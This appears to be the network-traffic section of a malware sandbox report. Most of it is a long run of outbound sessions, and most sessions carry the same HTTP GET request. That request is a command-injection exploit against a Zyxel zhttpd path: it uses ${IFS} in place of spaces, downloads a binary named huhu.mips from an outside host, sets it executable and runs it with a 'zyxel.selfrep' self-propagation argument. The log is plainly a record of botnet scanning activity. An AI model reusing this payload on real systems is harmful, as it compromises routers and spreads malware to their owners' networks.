                                                Jan 29, 2024 07:08:07.728663921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9202192.168.2.2352024189.3.87.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.728696108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9203192.168.2.2344758149.238.129.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.728729963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9204192.168.2.2333252175.32.244.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.728801966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9205192.168.2.233383285.32.81.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.728832006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9206192.168.2.2339030198.131.207.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.728868008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9207192.168.2.234752882.68.86.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.728894949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9208192.168.2.2346402222.153.52.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.728948116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9209192.168.2.234746673.211.11.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.728981972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9210192.168.2.234354688.132.152.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.729032993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9211192.168.2.2349754177.56.5.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.729074001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9212192.168.2.2336478141.125.19.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.729114056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9213192.168.2.235345665.0.3.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.729146957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9214192.168.2.234521269.236.143.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.729187965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9215192.168.2.2350834135.225.54.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.729228973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9216192.168.2.2338736160.6.57.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.729270935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9217192.168.2.2360250161.226.213.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.729305029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9218192.168.2.2355138169.205.188.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.729326010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9219192.168.2.2334500189.111.149.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.729373932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9220192.168.2.2333288159.224.238.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.729399920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9221192.168.2.234079652.43.15.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.729453087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9222192.168.2.2345718112.49.62.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.729484081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9223192.168.2.235868491.154.222.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.729527950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9224192.168.2.234393653.196.13.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.729568005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9225192.168.2.2356710154.223.93.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.729594946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9226192.168.2.2349330100.144.211.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.729630947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9227192.168.2.2342138135.132.66.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.729686022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9228192.168.2.2336068177.64.226.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.729717016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9229192.168.2.236091025.132.34.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.729758024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9230192.168.2.2355308173.92.137.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.729793072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9231192.168.2.2356474128.211.124.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.729829073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9232192.168.2.236063461.10.142.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.729860067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9233192.168.2.234468666.115.49.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.729918003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9234192.168.2.2354488140.245.107.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.729943037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9235192.168.2.2354132146.233.86.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.729984999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9236192.168.2.233716261.61.116.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.730024099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9237192.168.2.2335936161.3.180.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.730065107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9238192.168.2.2334994219.135.47.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.730086088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9239192.168.2.2333056131.139.52.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.730129004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9240192.168.2.236019072.144.166.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.730163097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9241192.168.2.234488014.50.236.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.730201006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9242192.168.2.2351432192.70.232.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.730262995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9243192.168.2.234808865.41.61.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.730282068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9244192.168.2.2349164140.220.92.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.730335951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9245192.168.2.235666486.62.176.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.730386972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9246192.168.2.234581292.94.103.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.730422974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9247192.168.2.2334554148.118.164.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.730448961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9248192.168.2.2359438121.117.186.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.730509043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9249192.168.2.2351432218.201.40.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.730541945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9250192.168.2.2344950210.254.134.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.730575085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9251192.168.2.2355234133.44.56.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.730640888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9252192.168.2.235492468.117.186.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.730668068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9253192.168.2.2335604180.182.89.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.730704069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9254192.168.2.233340890.87.229.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.730781078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9255192.168.2.2358108187.199.185.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.730803967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9256192.168.2.234428842.110.185.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.730844975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9257192.168.2.2359232210.229.154.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.730864048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9258192.168.2.2339776129.57.134.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.730932951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9259192.168.2.2334306188.57.39.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.730961084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9260192.168.2.235184093.5.165.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.730986118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9261192.168.2.23476724.60.65.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.731034994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9262192.168.2.2352462141.222.34.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.731070042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9263192.168.2.235854882.23.128.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.731122017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9264192.168.2.2337016191.7.78.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.731152058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9265192.168.2.2339224132.165.79.222443
                                                TimestampBytes transferredDirectionData
